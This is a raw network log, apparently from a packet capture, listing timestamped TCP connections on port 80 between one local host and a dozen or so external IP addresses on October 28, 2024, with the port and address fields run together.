                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:31.687119961 CET4996180192.168.2.418.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:31.697032928 CET4996480192.168.2.418.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:31.704041958 CET804996418.246.231.120192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:31.704103947 CET4996480192.168.2.418.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:31.704221964 CET4996480192.168.2.418.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:31.704242945 CET4996480192.168.2.418.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:31.709505081 CET804996418.246.231.120192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:31.712212086 CET804996418.246.231.120192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:32.556171894 CET804996418.246.231.120192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:32.560772896 CET4996480192.168.2.418.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:32.567116976 CET804996418.246.231.120192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:32.567168951 CET4996480192.168.2.418.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:32.677721024 CET4996980192.168.2.444.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:32.683224916 CET804996944.221.84.105192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:32.683300972 CET4996980192.168.2.444.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:32.685003042 CET4996980192.168.2.444.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:32.685168982 CET4996980192.168.2.444.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:32.690416098 CET804996944.221.84.105192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:32.690450907 CET804996944.221.84.105192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:33.342528105 CET4996980192.168.2.444.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:33.350625038 CET4997580192.168.2.444.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:33.355983973 CET804997544.221.84.105192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:33.359250069 CET4997580192.168.2.444.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:33.359962940 CET4997580192.168.2.444.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:33.360002041 CET4997580192.168.2.444.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:33.365315914 CET804997544.221.84.105192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:33.365343094 CET804997544.221.84.105192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:34.013256073 CET804997544.221.84.105192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:34.014231920 CET4997580192.168.2.444.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:34.020335913 CET804997544.221.84.105192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:34.021488905 CET4997580192.168.2.444.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:34.229958057 CET4998180192.168.2.454.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:34.235421896 CET804998154.244.188.177192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:34.236316919 CET4998180192.168.2.454.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:34.236495018 CET4998180192.168.2.454.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:34.236495018 CET4998180192.168.2.454.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:34.241954088 CET804998154.244.188.177192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:34.241964102 CET804998154.244.188.177192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:35.097230911 CET804998154.244.188.177192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:35.100892067 CET4998180192.168.2.454.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:35.106548071 CET804998154.244.188.177192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:35.106652021 CET4998180192.168.2.454.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:35.119079113 CET4998780192.168.2.43.254.94.185
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:35.124391079 CET80499873.254.94.185192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:35.124504089 CET4998780192.168.2.43.254.94.185
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:35.124983072 CET4998780192.168.2.43.254.94.185
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:35.124983072 CET4998780192.168.2.43.254.94.185
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:35.131634951 CET80499873.254.94.185192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:35.131644964 CET80499873.254.94.185192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:36.093620062 CET80499873.254.94.185192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:36.094124079 CET4998780192.168.2.43.254.94.185
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:36.100481987 CET80499873.254.94.185192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:36.100595951 CET4998780192.168.2.43.254.94.185
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:36.110694885 CET4999380192.168.2.418.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:36.116302013 CET804999318.141.10.107192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:36.116420031 CET4999380192.168.2.418.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:36.116564035 CET4999380192.168.2.418.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:36.116594076 CET4999380192.168.2.418.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:36.121851921 CET804999318.141.10.107192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:36.121879101 CET804999318.141.10.107192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:37.357537985 CET4999380192.168.2.418.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:37.362206936 CET4999780192.168.2.418.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:37.367935896 CET804999718.141.10.107192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:37.368066072 CET4999780192.168.2.418.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:37.368263006 CET4999780192.168.2.418.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:37.368288994 CET4999780192.168.2.418.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:37.376632929 CET804999718.141.10.107192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:37.376648903 CET804999718.141.10.107192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:38.804332018 CET804999718.141.10.107192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:38.804682016 CET4999780192.168.2.418.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:38.810961008 CET804999718.141.10.107192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:38.811079025 CET4999780192.168.2.418.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:38.822207928 CET5000580192.168.2.434.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:38.827646971 CET805000534.246.200.160192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:38.827774048 CET5000580192.168.2.434.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:38.827990055 CET5000580192.168.2.434.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:38.828011990 CET5000580192.168.2.434.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:38.833350897 CET805000534.246.200.160192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:38.833596945 CET805000534.246.200.160192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:40.012725115 CET805000534.246.200.160192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:40.016463995 CET805000534.246.200.160192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:40.016534090 CET5000580192.168.2.434.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:40.074063063 CET5000580192.168.2.434.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:40.079910994 CET805000534.246.200.160192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:40.245618105 CET5000980192.168.2.447.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:40.251174927 CET805000947.129.31.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:40.251305103 CET5000980192.168.2.447.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:40.261821985 CET5000980192.168.2.447.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:40.261843920 CET5000980192.168.2.447.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:40.267225027 CET805000947.129.31.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:40.267324924 CET805000947.129.31.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:41.326242924 CET5000980192.168.2.447.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:41.328227043 CET5001480192.168.2.447.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:41.333616018 CET805001447.129.31.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:41.335257053 CET5001480192.168.2.447.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:41.335401058 CET5001480192.168.2.447.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:41.335414886 CET5001480192.168.2.447.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:41.340648890 CET805001447.129.31.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:41.340919971 CET805001447.129.31.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:43.556391954 CET805001447.129.31.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:43.556576967 CET5001480192.168.2.447.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:43.562236071 CET805001447.129.31.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:43.562294006 CET5001480192.168.2.447.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:43.571455002 CET5002480192.168.2.43.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:43.576833010 CET80500243.94.10.34192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:43.576896906 CET5002480192.168.2.43.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:43.577054024 CET5002480192.168.2.43.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:43.577071905 CET5002480192.168.2.43.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:43.582499027 CET80500243.94.10.34192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:43.582519054 CET80500243.94.10.34192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:44.643255949 CET80500243.94.10.34192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:44.643481016 CET5002480192.168.2.43.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:44.650443077 CET80500243.94.10.34192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:44.650516987 CET5002480192.168.2.43.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:44.747360945 CET5002980192.168.2.435.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:44.752804995 CET805002935.164.78.200192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:44.752866030 CET5002980192.168.2.435.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:44.753194094 CET5002980192.168.2.435.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:44.753222942 CET5002980192.168.2.435.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:44.758613110 CET805002935.164.78.200192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:44.758629084 CET805002935.164.78.200192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:46.165713072 CET805002935.164.78.200192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:46.165937901 CET5002980192.168.2.435.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:46.166544914 CET805002935.164.78.200192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:46.166557074 CET805002935.164.78.200192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:46.166599035 CET5002980192.168.2.435.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:46.172363043 CET805002935.164.78.200192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:46.179622889 CET5003280192.168.2.418.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:46.185269117 CET805003218.141.10.107192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:46.185375929 CET5003280192.168.2.418.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:46.185539961 CET5003280192.168.2.418.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:46.185564995 CET5003280192.168.2.418.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:46.190885067 CET805003218.141.10.107192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:46.191600084 CET805003218.141.10.107192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:47.623069048 CET805003218.141.10.107192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:47.623265028 CET5003280192.168.2.418.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:47.628973007 CET805003218.141.10.107192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:47.629050016 CET5003280192.168.2.418.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:47.638452053 CET4976880192.168.2.4208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:47.638736963 CET5004180192.168.2.4208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:47.644017935 CET8050041208.100.26.245192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:47.644129038 CET8049768208.100.26.245192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:47.644155979 CET5004180192.168.2.4208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:47.644195080 CET4976880192.168.2.4208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:47.644360065 CET5004180192.168.2.4208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:47.644376040 CET5004180192.168.2.4208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:47.649609089 CET8050041208.100.26.245192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:47.649619102 CET8050041208.100.26.245192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:49.338663101 CET8050041208.100.26.245192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:49.342329979 CET5004180192.168.2.4208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:49.342377901 CET5004180192.168.2.4208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:49.347824097 CET8050041208.100.26.245192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:49.347843885 CET8050041208.100.26.245192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:49.486805916 CET8050041208.100.26.245192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:49.502119064 CET5005280192.168.2.444.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:49.508348942 CET805005244.221.84.105192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:49.508445978 CET5005280192.168.2.444.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:49.508557081 CET5005280192.168.2.444.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:49.508579969 CET5005280192.168.2.444.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:49.514636993 CET805005244.221.84.105192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:49.514647961 CET805005244.221.84.105192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:49.528333902 CET5004180192.168.2.4208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:50.453974009 CET805005244.221.84.105192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:50.454550982 CET805005244.221.84.105192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:50.454565048 CET805005244.221.84.105192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:50.454638004 CET5005280192.168.2.444.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:50.454750061 CET5005280192.168.2.444.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:50.457695007 CET805005244.221.84.105192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:50.460352898 CET805005244.221.84.105192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:50.460412025 CET5005280192.168.2.444.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:50.471276999 CET5005780192.168.2.434.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:50.477550983 CET805005734.211.97.45192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:50.481317997 CET5005780192.168.2.434.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:50.485996962 CET5005780192.168.2.434.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:50.486031055 CET5005780192.168.2.434.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:50.491355896 CET805005734.211.97.45192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:50.491374969 CET805005734.211.97.45192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:51.313765049 CET805005734.211.97.45192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:51.313962936 CET5005780192.168.2.434.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:51.321028948 CET805005734.211.97.45192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:51.321104050 CET5005780192.168.2.434.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:51.331468105 CET5006280192.168.2.418.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:51.337016106 CET805006218.208.156.248192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:51.337100029 CET5006280192.168.2.418.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:51.337209940 CET5006280192.168.2.418.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:51.337222099 CET5006280192.168.2.418.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:51.342695951 CET805006218.208.156.248192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:51.342726946 CET805006218.208.156.248192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:51.992820024 CET805006218.208.156.248192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:51.995943069 CET5006280192.168.2.418.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:52.004472017 CET805006218.208.156.248192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:52.005014896 CET5006280192.168.2.418.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:52.110398054 CET5006880192.168.2.43.254.94.185
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:52.118211031 CET80500683.254.94.185192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:52.119180918 CET5006880192.168.2.43.254.94.185
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:52.119317055 CET5006880192.168.2.43.254.94.185
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:52.119709969 CET5006880192.168.2.43.254.94.185
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:52.126600981 CET80500683.254.94.185192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:52.127067089 CET80500683.254.94.185192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:53.084430933 CET80500683.254.94.185192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:53.084666014 CET5006880192.168.2.43.254.94.185
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:53.124984980 CET80500683.254.94.185192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:53.125050068 CET5006880192.168.2.43.254.94.185
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:53.203608036 CET5007480192.168.2.454.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:53.209382057 CET805007454.244.188.177192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:53.209460020 CET5007480192.168.2.454.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:53.209602118 CET5007480192.168.2.454.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:53.209625959 CET5007480192.168.2.454.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:53.216650963 CET805007454.244.188.177192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:53.217566013 CET805007454.244.188.177192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:54.043091059 CET805007454.244.188.177192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:54.043267965 CET5007480192.168.2.454.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:54.049591064 CET805007454.244.188.177192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:54.049669981 CET5007480192.168.2.454.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:54.063219070 CET5008080192.168.2.454.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:54.068599939 CET805008054.244.188.177192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:54.068686008 CET5008080192.168.2.454.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:54.068969965 CET5008080192.168.2.454.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:54.068969965 CET5008080192.168.2.454.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:54.074378967 CET805008054.244.188.177192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:54.074670076 CET805008054.244.188.177192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:54.908963919 CET805008054.244.188.177192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:54.909466028 CET5008080192.168.2.454.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:54.915570974 CET805008054.244.188.177192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:54.915653944 CET5008080192.168.2.454.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:54.926114082 CET5008480192.168.2.418.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:54.931633949 CET805008418.246.231.120192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:54.932043076 CET5008480192.168.2.418.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:54.932168007 CET5008480192.168.2.418.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:54.932190895 CET5008480192.168.2.418.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:54.937608004 CET805008418.246.231.120192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:54.937752962 CET805008418.246.231.120192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:55.341010094 CET5004180192.168.2.4208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:55.341115952 CET4988180192.168.2.485.214.228.140
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:55.347204924 CET8050041208.100.26.245192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:55.347287893 CET5004180192.168.2.4208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:55.347490072 CET804988185.214.228.140192.168.2.4
